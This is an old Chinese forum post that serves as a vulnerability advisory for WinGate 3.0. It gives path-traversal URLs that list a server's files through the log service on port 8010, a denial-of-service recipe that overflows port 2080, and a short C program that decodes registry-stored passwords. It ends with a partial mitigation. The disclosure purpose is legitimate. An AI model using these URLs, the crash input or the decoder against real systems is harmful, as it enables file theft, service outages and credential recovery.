发信人: kevinlee()
整理人: williamlong(2000-03-24 16:01:27), 站内信件
|
受影响的系统:WinGate3.0 -Win9X -WinNT
不受影响的版本: 未知远程: YES / 本地:YES
内容摘要:
作为共享internet线路的好工具,wingate的在线用户达2%以上,总用户占proxy
service类软件的比例只怕有30% 以上,但是WinGate 3.0 有3个毛病.令入侵者
可以远程侵入WinGate Server的硬盘.
漏洞的利用:
1,远程用户可以窃取文件
毛病是wingate的Log file service引起的,默认情况下,所有的wingate service 是
设置为仅127.0.0.1这样的本机用户才能访问的,但是log file service是让用户 可以
远程浏览的,所以....在以前的版本就有这个毛病,现在又有不同的形式:
假设对方运行wingate3.0,其host为 www.server.com,则可以用浏览器输入下列字 串:
1、http://www.server.com:8010/c:/ - NT/Win9x
2、http://www.server.com:8010// - NT/Win9x
3、http://www.server.com:8010/..../ - Win9x
硬盘上每个文件就这样被列了出来
二,远程攻击
wingate 3.0的winsock重定向是设置在2080端口,当你用telnet之类的程序连接到 这个port然后
发送2000个字符然后断开, 所有的wingate服务都会完蛋
三.本地用户可以窃取密码.
wingate放密码的注册表的键值是不安全的,任何本地用户都可以解密,这个密码也 许和root密码是同一个....
编译下面这段代码:#include "stdafx.h"
#include
#include
main(int argc, char *argv[]) {
char i;
for(i = 0; i < strlen(argv[1]); i++)
putchar(argv[1][i]^(char)((i + 1) << 1));
return 0;
}
解决方案:
锁定所有服务,只允许127.0.0.1 loopback才能访问这些services 另外两个没有 办法 :(
-- -------
Sincerly
KevinLee
http://mudfrog.126.com (网络安全站点)
irc: shell.cicnet.cc:6667 #mudfrog (网络安全频道)
irc: irc.szonline.net:6667 #internet (网络安全频道)
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.96.190.124]
|
|